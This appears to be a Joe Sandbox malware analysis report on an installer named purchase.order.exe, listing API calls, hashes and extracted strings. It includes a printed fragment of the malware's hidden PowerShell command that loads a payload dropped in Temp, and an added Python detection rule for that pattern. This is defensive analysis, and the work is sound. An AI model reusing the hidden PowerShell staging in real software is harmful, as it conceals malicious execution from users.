                                          • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                          • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                          • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                          • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                          • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                          APIs
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                            • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                            • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                            • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                            • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                            • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                            • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                            • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                          • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                          • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                          • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                          • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                          • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                            • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                            • Part of subcall function 004067EF: CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                          • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                            • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                            • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                            • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                          • A, xrefs: 00404AD4
                                          • powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 004049CA
                                          • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                          • API String ID: 2624150263-3873935440
                                          • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                          • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                          • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                          • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
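The string block of the function above records the hand-off from the installer stub to the next stage: powershell.exe started with -windowstyle hidden, reading a dropped file under the user's Temp directory with gc -raw. The Python below is an added detection example, not part of the Joe Sandbox report and not vendor code; it runs over constructed process-creation events (the file names, the Dropped85 directory and the $Stage1 variable are placeholders, not values from this sample) and flags the combination of a hidden window, a raw file read into a variable, and a Temp-directory path on the command line.

```python
"""Added example: flag the loader staging pattern seen in the strings above.
Constructed events only; nothing here is taken from the sandbox report."""
import re
from typing import Dict, List, Tuple

# Constructed process-creation events in a simplified Sysmon Event ID 1 shape.
# Paths, the Dropped85 directory and the $Stage1 name are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # loader-style launch: installer on the Desktop spawns a hidden PowerShell
        # that slurps a dropped file from %LOCALAPPDATA%\Temp into a variable
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\user\Desktop\purchase.order.exe",
        "command_line": "powershell.exe -windowstyle hidden \"$Stage1=gc -raw "
                        "'C:\\Users\\user\\AppData\\Local\\Temp\\Dropped85\\stage1'\"",
    },
    {   # benign: interactive shell started from Explorer, nothing hidden
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -NoProfile -Command Get-Service",
    },
    {   # benign: scheduled script, hidden window but no raw read and no Temp path
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": "powershell.exe -WindowStyle Hidden -File "
                        "'C:\\Program Files\\Backup\\nightly.ps1'",
    },
]

# -windowstyle hidden, also the abbreviated -w hidden
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
# Get-Content (and its gc/cat/type aliases) with -Raw before any quoted argument
READ_RE = re.compile(r"\b(?:gc|get-content|cat|type)\b[^'\"]*-raw\b", re.IGNORECASE)
# any argument pointing into the per-user Temp directory
TEMP_PATH_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# parent binary living in a user-writable location rather than a system path
USER_DIR_RE = re.compile(r"\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData)\\", re.IGNORECASE)

HIDDEN = "hidden window"
RAW_READ = "raw file read into a variable"
TEMP_ARG = "command-line path under %LOCALAPPDATA%\\Temp"
USER_PARENT = "parent executable in a user-writable directory"


def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of indicators present in one process-creation event."""
    reasons: List[str] = []
    cmd = event["command_line"]
    if HIDDEN_RE.search(cmd):
        reasons.append(HIDDEN)
    if READ_RE.search(cmd):
        reasons.append(RAW_READ)
    if TEMP_PATH_RE.search(cmd):
        reasons.append(TEMP_ARG)
    if USER_DIR_RE.search(event["parent_image"]):
        reasons.append(USER_PARENT)
    return reasons


def is_suspicious(event: Dict[str, str]) -> bool:
    """Hidden window plus a Temp-directory argument is enough on its own;
    otherwise require three independent indicators so a lone hidden
    scheduled script (event 3 above) is not flagged."""
    reasons = classify(event)
    return (HIDDEN in reasons and TEMP_ARG in reasons) or len(reasons) >= 3


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and indicator list of every event that trips the rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if is_suspicious(e)]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {ev['parent_image']} -> {ev['image']}")
        for r in reasons:
            print(f"    - {r}")
```

In production the same regexes would be applied to the CommandLine and ParentImage fields of Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled). The third constructed event is there to show why a hidden window alone is a poor signal: the rule only fires when the hidden window is paired with a payload read out of the Temp directory, which is what the strings of this function show.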
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405C76
                                          • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CBE
                                          • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CE1
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CE7
                                          • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CF7
                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                          • FindClose.KERNEL32(00000000), ref: 00405DA6
                                          Strings
                                          • \*.*, xrefs: 00405CB8
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 00405C56
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-3719428342
                                          • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                          • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                          • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                          • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                          APIs
                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil, xrefs: 0040228E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil
                                          • API String ID: 542301482-3069811719
                                          • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                          • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                          • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                          • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                          • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                          • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                          • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                          • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                          • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                          • DeleteObject.GDI32(00000000), ref: 00405027
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                            • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                          • ShowWindow.USER32(?,00000005), ref: 00405189
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                          • GlobalFree.KERNEL32(00000000), ref: 00405367
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                          • ShowWindow.USER32(?,00000000), ref: 00405511
                                          • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                          • ShowWindow.USER32(00000000), ref: 00405523
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                          • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                          • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                          • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                          • GetSysColor.USER32(?), ref: 0040475F
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                          • lstrlenW.KERNEL32(?), ref: 00404780
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                          • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                          • SendMessageW.USER32(00000000), ref: 00404802
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                          • SetCursor.USER32(00000000), ref: 00404881
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                          • SetCursor.USER32(00000000), ref: 0040489D
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: : Completed$N
                                          • API String ID: 3103080414-2140067464
                                          • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                          • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                          • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                          • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                          • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                          • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                          • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                          • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                            • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                            • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                          • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                          • wsprintfA.USER32 ref: 00406206
                                          • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                          • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                            • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                            • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          Strings
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]
                                          • API String ID: 2171350718-461813615
                                          • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                          • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                          • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                          • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                          • CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 00406833
                                          • *?|<>/":, xrefs: 00406841
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-3170120941
                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                          • GetSysColor.USER32(00000000), ref: 00404582
                                          • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                          • SetBkMode.GDI32(?,?), ref: 0040459A
                                          • GetSysColor.USER32(?), ref: 004045AD
                                          • SetBkColor.GDI32(?,?), ref: 004045BD
                                          • DeleteObject.GDI32(?), ref: 004045D7
                                          • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                            • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                          • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                          • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                          • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                          • GetMessagePos.USER32 ref: 00404E9E
                                          • ScreenToClient.USER32(?,?), ref: 00404EB8
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
